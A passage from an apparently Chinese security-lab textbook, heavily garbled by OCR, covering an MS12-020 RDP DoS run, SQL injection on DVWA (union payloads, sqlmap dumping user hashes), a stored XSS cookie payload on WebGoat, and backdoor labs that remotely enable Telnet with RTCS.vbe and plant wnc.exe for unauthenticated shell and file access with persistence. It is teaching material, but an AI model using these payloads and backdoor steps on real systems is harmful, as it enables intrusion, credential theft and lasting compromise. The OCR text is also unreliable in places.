击 , 如 图 9-208 所 示 。 


ms? auxiliary(ms12_020_mazchannelids) > run 


193, 168, 1, 2:3389 - Sending MS12-020 Microsoft Remote Desktop Use- After- Free DoS 
193, 168, 1, 2; 3389 - 210 bytes sent 
193, 168, 1, 2; 3389 - Checking RDP status, ,, 


Auxiliary failed; Rex::HostUnreachable The host (193, 168, 1,2: 3389) was unreachable, 
Call stack; 


fusri share/ metasploit- f ramework/ lib/ rex/ socket/ comm Local, rb; 294; in "rescue in create_by_type| 


fusri share/ metasploit- framework/ Lib/ rex/ socket/ comm local, rb: 274: in "create by type' 


fusr/ share/ metasploit- framework/ Li b/ rex/ socket/ com Local, rb; 33; in "create 
Jusr/ share/ metasploit- f ramework/ Li b/ rex/ socket, rb; 47: in "create param 
- framework/ li b/ rex/ socket tcp, rb; 37; in "create param. 
- framework/ Li b/ rex/ socket/ tcp, rb: 2B; in "create 
- framework/ lib/ msf/ core/ exploit/ tcp. rb; 102: in "connect 
- frameuork/ modules/ auxi Li ary/ dos/ wi ndows/ rdp/ ms12. 020. maxchanneli ds, rb; 5| 


_rdp_up' 
fusr/ share/ metasploit- framework/ modules/ auxi li ary/ dos/ wi ndows/ rdp/ ms12_020_maxchannelids, rb; 1 
"run 


图 9-208 遭受 攻击 后 服务 器 的 结果 
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总 结 : MS12-020 漏洞 被 发 现 后 , 仍 有 很 多 服务 器 没有 升级 系统 补丁 修补 该 漏洞 ,导致 
存在 高 风险 。 对 于 服务 器 ,建议 开启 系统 自动 更 新 ,同时 安装 安全 软件 保护 服务 器 的 安 
全 性 。 


实验 29 SQL 注入 漏洞 


一 、 实 验 目的 
了 解 SQL 注入 漏洞 原理 ,掌握 SQL 注入 漏洞 的 发 现 、 验 证 及 利用 方法 ， 
二 、 实 验 所 需 软件 


服务 器 操作 系统 : 装 有 OWASP Broken Web 应 用 的 Linux CentOS 6. 3,IP 地 址 为 
193. 168. 1. 10, 

客户 机 操作 系统 : Windows all. IP 地 址 为 193. 168. 1. 100, 

工具 软件 : sqlmap, Burpsuite, 


实验 步骤 


CD 打开 浏览 器 ,在 地 址 栏 中 输入 目标 网 站 地 址 “http://193. 168. 1. 10/dvwa/login. 
php”, 打 开 DVWA ,使 用 账号 admin, 密 码 admin 登录 ,如 图 9-209 所 示 。 


Username 


admin | 


Password 


图 9-209 DVWA 登录 界面 


(2) 选择 SQL Injection, 在 输入 框 中 输入 “1”, 单 击 Submit 按钮 ,获取 id 为 1 的 用 户 信 
息 , 如 图 9-210 所 示 。 

(3) 在 输入 框 内 输入 "1'and 1 一 1--”( 注 意 -- 后 面 有 一 个 空格 ) , 单 击 Submit 按钮 ,如 
图 9-211 所 示 。 

参数 解释 如 下 。 

C: 两 个 减 号 ,后 面 一 个 空格 ,这 是 MySQL 数据 库 的 注解 符 ,用 于 将 后 面 的 内 容 标 为 
注释 。 
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Vulnerability: SQL Injection 


'curiteam.com/securityreviews/5DPON1PT6E.html 


lia.ori tion 
http://ferruh.mavituna.com/sql injection-cheatsheet-oku/ 
http:/Ipentestmonkey.net/cheat-sheet/sq!injection/mysql-sq!-injection-cheat-sheet 


图 9-210 SQL 注入 界面 


Vulnerability: SQL Injection 


More info 


http://www.securiteam.com/securityreviews/SDPONTPTGE.html 
http://en.wikipedia.org/wiki/SQL injection 


http:/ferruh.mavituna.com/sqLinjection-cheatsheet-oku/ 


http://pentestmonkey.net/cheat.sheet/sqLinjection/mysql-sql-injection-cheat sheet 


图 9-211 1'and 1=1-- 显示 效果 


(4) 发 现 和 id=1 相 比 没 有 变化 。 在 输入 框 中 输入 "1' or 1 一 1--”( 注 意 -- 后 面 有 一 个 空 
格 ) , 单 击 Submit 按钮 ,如 图 9-212 所 示 。 


Vulnerability: SQL Injection 


User ID: 


Tor 121— 


ID: 1' or 1-1-- 
First name: admin 
Surname: admin 


ID: 1' or 1-1-- 
First name: Gordon 
Surname: Brown 


ID: 1' or 1-1-- 
First name: user 
Surname: user 


图 9-212 1'or 1=1-- 显示 效果 
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发 现 出 现 了 所 有 用 户 的 信息 。 由 于 1=1 的 条 件 为 True, 那 么 id 二 1 or 1—1 即 为 永 真 ， 
所 以 可 以 获取 到 所 有 用 户 信 息 , 证 明 此 处 存在 SQL 注入 漏洞 。 

O 尝试 数据 库 联合 查询 获取 数据 库 信息 ,在 输入 框 中 输入 *1'and 1 一 2 union select 
version() ,database()--”, 单 击 Submit 按钮 ,如 图 9-213 所 示 。 


Vulnerability: SQL Injection 


User ID: 


ID: 1' and 1-2 union select version(),database()-- 


First name: 5.1.41-3ubuntul2.6-10g 
Surname: dvwa 


More info 


SQL Injection htp:llwww.securiteam.com/securityreviews/SDPONTPTGE.html 
http:/len.wikipedia.org/wiki/SQL. injection 
http:lferruh.mavituna.com/sql.injection-cheatsheet-oku/ 
http://pentestmonkey.net/cheat.sheet/sql injection/mysql-sqLinjection-cheat.sheet 


图 9-213 ”查询 数据 库 版 本 和 数据 库 名 


参数 解释 如 下 。 

versionO : 为 MySQL 数据 库 中 的 获取 版 本 信息 的 函数 。 

databaseO : 为 MySQL 数据 库 中 获取 当前 使 用 的 数据 库 的 函数 。 

(6) 获取 数据 库 的 信息 ,在 输入 框 中 输入 *1'and 1 一 2 union select 1 ，schema_name 
from information_schema. schemata--”, 单 击 Submit 按钮 ,可 以 看 到 surname 后 跟着 数据 
库 名 ,如 图 9-214 Bion o 


Vulnerability: SQL Injection 


User ID: 
ion schema schemata- ( Submit | 


BueForce | ID: 1' and 1=2 union select 1 , schema name from information schema.schemara-- 


First name: 1 
Surname: information schema 


ID: 1' and 1-2 union select 1 , schema name from information schema.schemata-- 
First name: 1 
Surname: dvwa 


图 9-214 查询 数据 库 名 


参数 解释 如 下 。 

information schema: 为 MySQL 系统 数据 库 ,其 中 ,SCHEMATA 表 存 放 所 有 数据 库 
信息 ,TABLES 表 存 放 所 有 表 信 息 ,COLUMNS 表 存 放 所 有 列 信息 。 

(7) 获取 DVWA 数据 库 中 的 表 的 列表 .在 输入 框 中 输入 "1'and 1— 2 union select 
group concat(table name). 2 from information schema. tables where table. schema = 
0x647677613t " CH P .0x64767761 为 dvwa 的 十 六 进 制 形式 ,也 可 用 'dvwa' 代 蔡 ), 单 击 
Submit 按钮 ,如 图 9-215 所 示 。 

参数 解释 如 下 。 

group_concat() : 为 MySQL 中 合并 字符 串 的 函数 。 
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Vulnerability: SQL Injection 


User ID: 


ID: 1' and 1-2 union select group concat(rable name), 2 from information schemd.tables where table schema-0x64767761f 
First name: guestbook,users 
Surname: 2 


图 9-215 ”查询 数据 库 列 名 
(8) 获取 字段 名 ,在 输入 框 中 输入 *'and 1=2 union select group_concat Ccolumn | 


name). 2 from information schema. columns where table_ name = 0x7573657273 #” 


(0x7573657273 JJ users 的 十 六 进 制 ) , 单 击 Submit 按钮 ,如 图 9-216 所 示 。 
Vulnerability: SQL Injection 


User ID: 
[Suma ] 
ID: ' and 1-2 union select group concat(column name), 2 from information schemd.columna where table name-0x75736572738 
First name: user id,first name,last name,user,password,avatar 
Surname: 2 


图 9-216 ”查询 字段 


(9) 获取 用 户 账 户 和 密码 ,在 输入 框 中 输入 *'and 1—2 union select group. concatCuser, 
0x3A, password), 2 from dvwa. users & ” , If; Submit 按钮 ,如 图 9-217 所 示 。 


Vulnerability: SQL Injection 
User ID: 

LSubmt | 
ID: ' and 1-2 union select group concat(user , 0x3A, password), 2 from dvwa.usdrsf 


First name: admin:21232f297a57a5a743894a0e4a801fc3, gordonb:e99a18c428cb38d5f260853678922603,1337 
Surname: 2 


图 9-217 ”查询 数据 库 账户 和 密码 
共有 6 个 : 


admin:21232f297a57a5a743894a0e4a801fc3 
gordonb:e99al8c428cb38d5f260853678922e03 
1337:8d3533d75ae2c3966d7e0d4fcc69216b 
pablo:0d107d09f5bbe40cade3de5c71e9e9b7 
smithy:5f4dcc3b5aa765d61d8327deb882cf99 
user:eellcbb19052e40b07aac0ca060c23ee 


(10) 打开 火狐 浏览 器 ,设置 浏览 器 代理 地 址 为 127. 0. 0. 1 ,端口 为 8080, 如 图 9-218 
所 示 。 

(11) 打开 Burpsuite, 设 置 监听 的 地 址 和 端口 ,默认 情况 下 已 经 设置 了 127. 0. 0. 1 和 端 
H 8080 代理 。 如 果 没 有 请 选择 Proxy Options Proxy listeners~~Add, 地 址 填 127. 0. 0. 1 , 端 
口 填 8080 ,如 图 9-219 所 示 。Burpsuite 的 运行 需要 Java 的 v1. 5 十 环境 ,请 先 安装 Java. 
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配置 访问 国际 互联 网 的 代理 

日 不 使 用 K 理 m 

O 自动 检测 此 网 络 的 代理 设置 (W) 
O 使 用 系统 代理 设置 (U) 

© 手动 配置 代理 : (M) 


HTTP 代理 : 00 127001 ED :四 8080 自 
[V] 为 所 有 协议 使 用 相同 代理 (S) 

SSL 代理 : [127001 S0: (Œ | 8080 月 

HP 代理 : [127001 *D:(9) | 8080 月 

socks 主 机 : [127001 s: [ sos% 


SOCKSv4 @ SOCKS v5 回 远 租 DNS 


图 9-218 设置 浏览 器 代理 


回 These settings control how Burp binds the proxy listener. 


ee | 
Bind to address: @ Loopback only 
© Al interfaces 


es- 
图 9-219 设置 Burpsuite 代理 


(12) 在 Burpsuite 中 选择 Proxy — Intercept, 将 Intercept 选项 卡 打 开 , 如 图 9-220 
所 示 。 


RE 
forse rr natory [ wotsoctets story [ op | 


图 9-220 设置 Intercept 为 启动 状态 


(13) 打开 DVWA, 选 择 SQL-Injection 栏目 ,在 输入 框 中 输入 *1”, 单 击 Submit 按钮 提 
交 , 查 看 Burpsuite, 发 现 已 经 成 功 截取 数据 包 , 接 着 看 Burpsuite 的 抓 包 结果 ,如 图 9-221 
所 示 。 


可 以 看 到 提交 的 过 程 是 Get 方法 ,提交 id— 1 和 Submit 二 Submit, 页 面 是 193. 168. 1. 10/ 


dvwa/vulnerabilityies/ sqli。 
(14) 启动 sqlmap 工具 ,输入 
sqlmap -u" http://193. 168. 1. 10/dvwa/vulnerabilities/sqli/?id = 1&Submit = Submit 
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Burp intruder Repeater Window Help 


[ Target í Braa | Spider [ Scanner | intruder | Repeater | Sequencer | Decoder | comparer | Extender | options | Arns | 


_ ee | HTTP history | webSockets history | options | 


园 Request to ntpy19316811080 
Forward || Drop intercept is on Action 


maw.| Params | Headers | nex | 


GET /dvwa/vulnerabilities/sqli/?id-1&Submit-Submit HTTP/1.1 

Host: 193.168.1.10 

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOWE4; rv:44.0) 

Ac : text/html, application/xhtml+xml, applicati 

Accept-Language: zh-CN, zh;q-0.8,en-US;q-0.5,en;q 

Accept-Encoding: gzip, deflate 

Referer: http://193.168.1.10/dvwa/vulnerabilities/sqli/ 
okie: security= PHPSESSID 

Connection: keep-alive 


Gecko/20100101 Firefox/44.0 
m1;q-0.9,*/*;q-0.8 


40cssmch4e£1jmjuB 


9-221 burpsuite 抓 取 数 据 包 

cookie= " PHPSESSID = elc40c 

Burpsuite 截取 的 请 
信息 ) 


结果 如 图 9-222 所 示 。 


smch4e6ljmju8vu73k4; security = low" Cc 


求 的 cookie, 每 个 人 都 不 一 样 ,注意 实验 过 


kie WH 
:中 使 用 自己 登录 的 cookie 


[x] starting at 13:82:21 


[INFO] testing connection to the target url 

[INFO] testing if the url is stable, wait a few seconds 
[INFO] url is stable 

[INFO] testing if GET parameter id’ is dynamic 
[WARNING] GET parameter 'id' appears to be not dynamic 
[INFO] heuristics detected web page charset ’ 

[WARNING] reflective value(s) found and filter: 


[INFO] heuristic test shows that GET parameter ’id’ 


might be injectabhl 
le «possible DBMS: MySQL) 


Æ 9-222 sqlmap 检测 数据 库 类 型 


从 返回 结果 看 到 ,sqlmap 识别 出 id 参数 可 以 被 注入 ,数据 库 是 MySQL. 


(15) 在 上 面 的 命令 后 面 ,加 上 “--current-db”, 扫 描 出 当前 的 数据 库 , 可 以 看 到 数据 库 为 
dvwa, 如 图 9 3 所 示 o 


?] [INFO] fetching current database 
7] [WARNING] reflective value(s) found and filtering out 
’ duwa’ 
71 [VARNING] cannot properly display Unicode character 
command prompt http://bugs.python.org/ uei6825. R11 u 
11 result in replacement with '?' character. Please, 


inside Windo 
handled occurances wil 
find proper character repre 


de corresponding output files. 
:17] [INFO] fetched data logged to text files under KE 


[x] shutting down at 13:03:17 
图 9-223 获取 数据 库 名 称 
参数 解释 如 下 。 
--current-db: 用 于 获取 当前 数据 库 。 


(16) 在 命令 后 继续 加 上 “--table -D dvwa” ,扫描 dvwa 数据 库 的 所 有 表 ,可 看 到 有 两 个 
表 : guestbook 和 users, 如 图 9-224 所 示 。 
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:83:45] [INFO] fetching current database 
? dvua* 
3:45] [INFO] fetching tables for database: ’dvwa’ 


A 9-224 获取 dvwa 数据 库 中 的 表 


参数 解释 如 下 。 
D: 指定 当前 注入 需要 获取 哪个 数据 库 的 表 。 
tables; 用 于 获取 指定 数据 库 的 所 有 表 名 。 
(17) 接着 dump 下 users 表 的 所 有 内 容 , 也 就 是 拖 库 。 
sqlmap -u" http://193. 168. 1. 10/dvwa/ vulnerabilities/sgli/?id = 1&.Submit = Submit" 
cookie— "PHPSESSID- elc40cssmch4e61jmju8vu73k4 ; security —low"- T users--dump 


结果 如 图 9-225 所 示 。 


1 user_id | user | avatar password 
" 


11 | admin | http://owaspbwa/duwa/hackable/users/admin. jpg 
[raSTaSaT43894a0e4a80lfc3 | admin | admin 1 

E | gordonb | http://owaspbwa/duwa/hackable/users/gordonb. jpg 
28cb38d5£260853678922e03 | Broun | Gordon 1 

13 | 1337 — | http://owaspbua/duua/hackable/users/1337. jpg 
;ae2c3966dTeOd4fcc69216b | Me | Hack 1 

E | pablo | http://owaspbua/duua/hackable/users/pablo. jpg 
[F5bbe40cade3de5c71e9e9b7 | Picasso | Pablo 1 

15 | smithy | http://owaspbwa/duwa/hackable/users/smithy. jpg 
baaT65d61d8327deb882cf99 | Smith 1 Bob 1 

1 6 1 user | http://owaspbwa/duwa/hackable/users/1337. jpg 
o052e0b07aacOca060c23ee | user 1 

和 Fe 


9-225 ”获取 表 中 的 账号 和 密码 内 容 


参数 解释 如 下 。 
T: 指定 当前 注入 需要 获取 哪个 表 的 内 容 。 
dump: 将 获取 的 所 有 内 容 保 存 到 本 地 

可 以 看 到 第 一 个 账号 就 是 登录 页 面 admin 账号 ,后 面 的 212 
01fc3 是 密码 password 的 md5 值 ,再 通过 md5 网 站 (www. cmd5. com) 反 查 出 密码 。 

总 结 : SQL 注入 是 Web 漏洞 中 危害 性 很 高 的 漏洞 . 它 的 原理 是 因为 表单 提交 的 数据 被 
直接 提交 到 数据 库 用 户 可 利用 此 漏洞 对 数据 库 进 行 添加 、 删 除 、 修 改 等 操作 ,获取 数据 
库 用 户 的 账号 ,甚至 权限 过 大 可 执行 系统 命令 。 


13894a0e4a8 


实验 30 XSS 跨 站 脚本 漏洞 


一 、 实 验 目的 
Y fit XSS 跨 站 脚本 漏洞 原理 ,掌握 XSS 跨 站 脚本 漏洞 ,发 现 ,验证 及 利用 方法 。 
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二 、 实 验 所 需 软 件 


服务 器 操作 系统 : 装 有 OWASP WebGoat 应 用 的 Linux CentOS 6. 3,IP 地 址 为 


193. 168. 1. 12, 


客户 机 操作 系统 : Windows all,IP 地 址 为 193. 168. 1. 100, 


三 、 实 验 步骤 


CD. 打开 浏览 器 ,在 地 址 栏 中 输入 目标 网 站 地 址 “http://193. 168. 1. 12/WebGoat/ 


attack?Screen 二 70&menu 二 900”, 账 户 guest, 密 码 guest, 如 图 9-226 所 示 。 


(2) 单 击 Start WebGoat 按钮 , 开 测 试 选项 页 面 ,如 图 9-227 所 示 。 


: 
位 于 WebGoat Application 的 服务 器 193.168.112 要 求 用 户 名 和 密 OWASP aspect) SECURITY 
* TA op Rica fci Net 
meten zi ee 
k 求 以 不 安全 的 方式 发 送 您 的 用 户 侣 和 密码 (没有 安全 连接 Bruce Mak 
的 基本 认证 ) Jeff Williams 


WebGoat Design Team V5.4 Lesson Contributers 


David Andenon Sherif Kousa 
m guest Laurence Casey (Graphics) Yiannis Paviosoglou 
Rogan Dawes 


O 记 住 我 的 赁 据 Special Thanks for V54 Documentation Contributers 
Brian Ciomei (Multitude of bug fixes) pru 
"To all who have sent comments. Ere ecd 
indic 
图 9-226 登录 WebGoat 图 9-227 启动 WebGoat 


(3) 选择 Cross-Site Scripting (XSS) 储 存 型 跨 站 脚本 漏洞 ,如 图 9-228 所 示 。 


Introduction 

General 

Access Control Flaws 

pi It is always a good practice to scrub all input, especially those inputs that will later be used as 

Buff er Ove ri — parameters to OS commands, scripts, and database queries. It is particularly important for 

Code Quality content that will be permanently stored somewhere in the application. Users should not be 
able to create message content that could cause another user to load an undesireable page or 


TE] undesireable content when the user's message is retrieved. 


Solution Videos Restart this Lesson 


LAB: Cross Site Scripting Title: 
State 1: stored 5 Message: n 


Sage s: astees (Submit) 


Reflected XSS Attacks Message List 

Cross Site Request Forgery 

rs AsPECT) sEcuRiTY 
CSRE Prompt By-Pass Anplcatin Secusty bars 


OWASP Foundation | Project WebGoat | Report Bug 
E 9-228 XSS 存储 型 跨 站 脚本 界面 
(4) 首先 测试 特殊 字符 是 否 过 滤 , 在 留言 框 中 输入 "XSS,;() 氨 >” 之后, 单 击 Submit 


按钮 ,如 图 9-229 所 示 。 


C5) 提交 成 功 后 ,在 留言 框 下 会 显示 提交 的 内 容 , 如 图 9-230 所 示 。 
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€ 9 @ 193.168.1.12/WebGoat/attac 


Choose another language: 


02 708 menu -900 g 器 


English ~ Logout @ 


k?Scres 


Stored XSS Attacks 


OWASP WebGoat v5.4 EA 11 16i iui 


Introduction. 
General 

Access Control Flaws 
AJAX Security 
Authentication Flaws 
Buffer Overflows 

Code Quality 
Concurrency 

Cross-Site Scripting (XSS) 


Phishing with X55 
LAB: Cross Site Scripting 
state 1: stored xs 


TFT 


State 3 stored xs 
ee 


HITPOnk Test. 


Crom Site Trarine DIST) 


Introduction. 
General 
Access Control Flaws 
AJAX Security 
Authentication Flaws 
Buffer Overflows 
Code Quality 
Concurrency 
Cross-Site Scripting (XSS) 
Phishing with X55 
LAB: Cross Site Scris 
stage 1: stored X 
Stage 2: Bock stored x55 


ing input validation 


Stage : stored xis 
Bevisited 


Stage 4: Bock stored xs 
using OVtput Encoding 


State 5: Seflected xs 
Stage 6: Bock aefiected 155 
Stored X55 Attacks 


Reflected XSS Attacks 


{CSRE) 


CSRE Prompt Bv-Pass 
CSRF Token By-Pass 
HTTPOnly Test 


Cross Site Tracing (XST) 
Attacks 


Tmnenner Ferne Handlinn 


(6) 单 击 查看 刚才 的 留 
过 滤 ,如 图 9-231 所 示 。 


Choose another language: 


Solution Videos Restart this Lesson 


It is always a good practice to scrub all input, especially those inputs that will later be used as 
parameters to OS commands, scripts, and database queries. It is particularly important for 
content that will be permanently stored somewhere in the application. Users should not be 
able to create message content that could cause another user to load an undesireable page or 
undesirable content when the user's message is retrieved. 


Message List 


ASPECTISECURITY 


OWASP Foundation | Project WebGoat | Report Bug 


9-229 ”检测 过 滤 情 况 


Logout @ 


Stored XSS Attacks 


OWASP WebGoat v5.4 EL) 


Solution Videos Restart this Lesson 


It is always a good practice to scrub all input, especially those inputs that will later be used as 
parameters to OS commands, scripts, and database queries. It is particularly important for 
content that will be permanently stored somewhere in the application. Users should not be 
able to create message content that could cause another user to load an undesireable page or 
undesireable content when the user's message is retrieved. 


Title: 
Message: 


[ suomi ) 


ASPECT|SECURİTY 
optein fact boars 


OWASP Foundation | Project WebGoat | Report Bug 


A 9-230 ”查看 提交 的 数据 列表 


:发 现 输入 内 容 全 部 显示 ,说 明 系统 内 部 没有 对 关键 字符 进 


和 


T= 


(€) @ 193168:12/WebGoat/attack?Num-3 gæv ciae 


Choose another language: English ~ Logout @ 


Stored XSS Attacks 


OWASP WebGoat v5.4 p- -I 111. 15d 


Introduction 


Er] Solution Videos Restart this Lesson 

Access Control Flaws 

peream It is always a good practice to scrub all input, especially those inputs that will later be used as 
fferOverlws parameters to OS commands, scripts, and database queries. It is particularly important for 

[1 Content that will be permanently stored somewhere in the application. Users should 

Concurrency able to create message content that could cause another user to oad an undesireable page or 

Cross Site Scripting (XSS) undesireable content when the user's message is retrieved. 

Improper Errar Handing 

Injection Flaws 

Denial of Service Title: 

Insecure Communication Message: 


Insecure Configuration 
Insecure Storage 

Malicious Execution 
Parameter Tampering 
Session Management Flaws 
Web Services 

Admin Functions 

Challenge 


Message List 


图 9-231 查看 提交 的 数据 过 滤 情 况 
CD TERI EC D EAE" — script? alert 1) — /script "ETT 9 A . [s 9-232 所 示 。 


€& @ 193168112/WebGoat/sttack?Num-12 Uv x || EE | $ 


9-232 HAAR 


(8) 通过 脚本 执行 的 特性 可 以 进行 进一步 操作 进而 获取 用 户 cookie。 在 输入 框 中 输入 
“<script>alert (document. cookie) </script>” , 4H A] 9-333 所 示 。 

总 结 : KSS 跨 站 脚本 漏洞 实质 为 用 户 插入 的 脚本 代码 被 网 页 解析 执行 了 ,用 户 可 插入 
并 执行 任意 JavaScript 脚本 。 在 网 站 开发 时 ,一 定 要 做 好 输入 输出 的 过 滤 , 防 止 类 似 安全 事 
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所 | @ 193.168.112/WebGoat/attack?Screen=70&menu=900 gzv eja 


Choose another language: English ~ Logout @ 


Stored XSS Attacks 


OWASP WebGoat v5.4 E00 Mu 


iae a Solution Videos Restart this Lesson 
Access Control Flaws 
pos Senay " It is always a good practice to scrub all input, especially those inputs that will later be used as 
Buffer Overflows Parameters to OS commands, scripts, and database queries. It is particularly important for 
Code qus content that will be permanently stored somewhere in the applicabon. Users should not 

able to create message content that could cause another user to load an undesireable We or 


Concurren 
Cross-Site Scripting (xss) 
Phishing with x55 
LAB: Cross Site Scripting Tie: cookie 
Sace t: Stored. Message: cscript>alert (document .cookie)</script> 


Sase 2: Bock stored ss 
taing input vabdation 


Sane Y stored xs 
Bes 


State 4: Bock stored oss 
aint Output encoding 


undesireable content when the user's message is retriev 


Eat sp aefededxs — 5([I— |.Submit: 


(€—— Message Ust 
s 

E 9-233 ”获取 cookie fl 
件 的 发 生 。 


实验 31 使 用 工具 RTCS 远程 开启 Telnet 服务 


、 实 验 目 的 


使 用 工具 RTCS 并 且 同 时 有 对 方 管理 员 的 用 户 名 和 密码 ,就 可 以 Telnet 登录 到 对 方 的 
命令 行 ,进而 操作 对 方 的 文件 系统 。 


二 、 实 验 所 需 软 件 


服务 器 操作 系统 : Windows 2000/Windows XP.IP 地 址 为 192. 168. 1. 2 。 

客户 机 操作 系统 : Windows 2000 Advance Server/ Windows XP,IP 地 址 为 192. 168. 1. 3。 

实验 时 ,如 果 没 有 两 台 机 器 ,可 以 使 用 虚拟 机 ,在 虚拟 机 下 安装 服务 器 Windows 2000 
Advance Server/Windows XP。 也 可 以 把 客户 机 和 服务 器 同时 安装 到 虚拟 机 下 。 

工具 软件 : RTCS. vbe 


三 、 实 验 步 又 


利用 工具 RTCS. vbe 可 以 远程 开启 对 方 主机 的 Telnet 服务 ,使 用 该 工具 需要 知道 对 方 
具有 管理 员 权限 的 用 户 名 和 密码 。 使 用 的 命令 是 “cscript RTOS, vbe 192. 168. 1. 2 
Administrator 123456 1 23”, 其 中 ,cscript 是 操作 系统 自 带 的 命令 ,RTCS. vbe 是 该 工具 软 
件 的 脚本 文件 ,IP 地 址 是 要 启动 Telnet 的 主机 地 址 ,Administration 是 用 户 名 ,123456 是 密 
13.1 是 登录 系统 的 验证 方式 ,23 是 Telnet 开放 的 端口 。 该 命令 执行 时 根据 网 络 的 速度 , 需 


y x 


$3 


要 一 段 时 间 ,开启 远程 Telnet 服务 的 验证 过 程 如 图 9-234 所 示 。 


‘WINNT\system32\cmd.exe 
[RrCS v1.08 
[Remote Telnet Configure Script. by zezevazzz 
Welcome to visite www.isgrey.com 
Usage: 
Icscript C: Documents and Settings\hdministrator\ 桌 面 \RICS .vbe targetIP username 
[password NILMüuthor telnetport 
It vill auto change state of target telnet server. 


Conneting 192.168.1.2 k 


Setting port-23.... 
lox? 
Querying state of telnet server.... 


Target telnet rver has been START Succe: ully! 
Nou, you can try: telnet 192.168.1.2 23, to get a shell. 


[C:\Documents and Settings Administrator $ Fm 


9-234 ”开启 远程 Telnet 服务 


执行 完成 后 ,对 方 主机 的 Telnet 服务 3 
Telnet 服务 ,首先 输入 命令 “Telnet 192. 168. 
的 。 出 现 确认 发 送信 息 提示 ,如 图 9-235 所 示 


被 开启 了 。 在 DOS 提示 符 其 对 方 主 机 的 
因为 Telnet 的 用 户 名 和 密码 是 明文 传递 


INNT\system32\Telnet.exe 
2000 <TM) RÆ 5.98 (A 
印 使 用 Microsoft Telnet Client 
elnet Client 内 部 版 本 号 5.00.99206.1 


为 “CTRL+ 


图 9-235 ”确认 发 送信 息 


输入 字符 “y”, 进 入 Telnet 的 登录 界面 ,此 时 需要 输入 对 方 主机 的 用 户 名 和 密码 ,如 


图 9-236 Bron. 


TREEERL .B 


TLM Authentication failed due to insufficient credentials. Please login vith 
lear text usernane and password 

icrosoft (R) Windows <TM) Version 5.98 《Build 2195) 

lelcome to Microsoft Telnet Service 

elnet Server Build 5.80.99201.1 


login: fdninistrator 
—— 


图 9-236 ”登录 Telnet 的 用 户 名 和 密码 
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如 果 用 户 名 和 密码 没有 错误 ,将 进入 对 方 主机 的 命令 行 ,如 图 9-237 所 示 。 


图 9-237 登录 Telnet 服务 器 


个 后 门 利用 已 经 得 到 的 管理 员 和 密码 远程 开启 对 方 主机 的 Telnet 服务 ,实现 对 目标 
主机 的 长 久 的 入侵 。 


实验 32 ”利用 工具 软件 wne 建立 Web 服务 和 Telnet 服务 


、 实 验 目的 


使 用 工具 软件 wnc. exe 可 以 在 对 方 主机 上 开启 Web 服务 和 Telnet 服务 。 其 中 , Web 
服务 的 端口 是 808,Telnet 服务 的 端口 是 707 


二 、 实 验 所 需 软件 


客户 机 操作 系统 : Windows 2000/Windows XP.IP 地 址 为 192. 168. 1. 1 。 

服务 器 操作 id Windows 2000 Advance Server/ Windows XP.IP 地 址 为 192. 168. 1. 2, 

实验 时 ,如 果 没 有 两 台 机 器 ,可 以 使 用 虚拟 机 ,在 虚拟 机 下 安装 服务 器 Windows 2000 
Advance Server/Windows XP。 也 可 以 把 客户 机 和 服务 器 同时 安装 到 虚拟 机 下 。 

工具 软件 : wnc. exe, 


三 、 实 验 步骤 


执行 过 程 很 简 单 , 只 要 在 对 方 的 主机 上 执行 一 次 wnc. exe 即 可 ,如 图 9-238 所 示 。 执 行 
完毕 后 ,利用 命令 “netstat -an” 来 查看 开启 的 808 和 707 端口 ,如 图 9-239 所 示 。 图 9-239 所 
示 状 态 说 明 服 务 端口 开启 成 功 , 可 以 连接 该 目标 主机 提供 的 这 两 个 服务 。 首 先 测试 Web 服 
务 的 808 端口 ,前提 是 目标 主机 是 Web 服务 器 ,在 本 机 浏览 器 地 址 栏 中 输入 “http://192. 
168. 1.2:808”, 就 会 出 现 目标 主机 的 盘 符 列表 ,如 图 9-240 所 示 。 


图 9-238 ”运行 cmd 建立 Web 服务 和 Telnet 服务 
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INNT System32cmd.exe 


C:\Documents and Settings \Adninistratormnetstat -an 
Active Connections 


Proto fiddress pei State 
TCP .8.8.8:21 .8.8.0: LISTENING 
TCP -08.8.8: -| .8: LISTENING 
TCP 四 E a LISTENING 
TCP 8.8. i LISTENING 
TCP 8.8. i LISTENING 
TCP NM " al LISTENING 
TCP z -| .8: LISTENING 
TCP .0.80.0: NN LISTENING 
TCP -0.0.0: l RE LISTENING 
ICP .0.8. B e! LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 


9-239 ”开启 的 端口 列表 


Æ} ADSERVER - Microsoft Internet Explorer 
文件 F) RED SEV EQ) IAD 帮助 0 


Qse- O ha0eyArn yt 6€ 3-2 8- 


Hit QD (Æ http: /7192. 168.1.2:808/ Era ue 


© ADSERVER 


Bc:\ Fixed Bytes free: 3042M/4078M 


dE: CDROM 


Network Neighborhood 


» 


GE @ Internet 


9-240 使 用 WEB 服务 


可 以 下 载 对 方 硬 盘 设 置 光 盘 上 的 任意 文件 (对 于 中 文字 符 文件 名 的 文件 下 载 可 能 会 不 
成 功 ) ,可 以 到 Winnt/Temp 目录 下 查看 对 方 密码 修改 记录 文件 ,如 图 9-241 所 示 。 

从 图 9-241 中 可 以 看 出 ,该 Web 服务 还 提供 文件 的 上 传 功能 ,可 以 上 传 本 地 文件 到 对 
方 服务 器 的 任意 目录 。 上 传 text. txt 文件 ,并 能 查看 上 传 的 文件 内 容 , 如 图 9-242 所 示 。 

可 以 利用 “Telnet 192. 168. 1. 2 707” 命 令 登录 到 目标 主机 的 命令 行 ,执行 方法 如 图 9-243 
所 示 。 

不 用 任何 的 用 户 名 和 密码 就 能 登录 到 目标 主机 的 命令 行 ,如 图 9-244 所 示 。 

通过 707 端口 也 可 以 获得 目标 主机 的 管理 员 权 限 。wnc. exe 不 能 自动 加 载 执行 ,需要 
将 该 文件 加 载 到 自 启动 程序 列表 中 。 一 般 将 wnc. exe 文件 放 到 对 方 的 windows 目录 或 者 
System32 目录 下 。 这 两 个 目录 是 系统 环境 目录 ,执行 这 两 个 目录 下 的 文件 不 需要 给 出 具体 
的 路 径 。 
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A C:\ - Nicrosoft Internet Explorer 
文件 EF) SED FEV KEW IRO 帮助 00) 


Qa- 0- hagon kagou 3 


Haik QD 48) http://192. 168. 1. 2:808/%DRIVEXC: / 


a 
Directory: C:\ 
Date Time Size ^ Filename 
10-18-2002 20:50 <DIR> Documents and Settingsi 
10-18-2002 21:01 <DIR> CjInetpuby 
10-18-2002 20:51 <DIR> Program Files\ 
03-15-2014 02:38 DIR> CiRecycledy 
10-18-2002 20:45 DIR> CQWINNIV 
03-15-2014 03:03 267685 4122360. jpg 
